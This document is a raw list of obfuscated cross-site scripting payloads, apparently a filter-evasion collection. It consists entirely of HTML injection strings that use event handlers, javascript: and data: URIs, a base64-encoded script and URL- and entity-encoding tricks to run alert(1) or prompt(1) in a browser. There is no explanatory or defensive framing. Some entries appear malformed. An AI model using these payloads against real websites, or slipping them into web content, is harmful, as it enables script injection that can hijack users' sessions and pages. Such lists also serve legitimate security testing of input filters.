"'>
</xss>
<svg><script/==>al%26%23x65rt(1)</script ?
<img/src="x"onerror="al%26%23x65rt(1)">
<object/data="da%26%23x74;a:text/html,<svg/onload=al%26%23x65rt(1)>">
<object/data="dat%26%23x61:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<form><button/formaction=jav%26%23x61%3Bscript:%26%23x61%3Blert(1)>sublimt
<input/value=x%0Concut=aler%26%23x74(1)>
<input/type=image%0Csrc=0%0Conerror=aler%26%23x74(1)>
<input/onblur=aler%26%23x74(1)%0Cautofocus>
<iframe%0C%00%0Csrc="javascrip%26%23x74:promp%26%23x74(1)"%00>
<iframe/srcdoc="&lt;svg/onload=alert(1)&gt;"></iframe>
<img/src=="x%20onerror=aler%26%23x(1)//">
<audio/src="x"onloadstart=al%26%23x65%3Brt(1)></audio>
<svg><script/xlink:href=data::,aler%26%23x74%3B(1)></script
<object/data=data::,aler%26%23x74%3B(1)>
<body/onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//1.1"></iframe>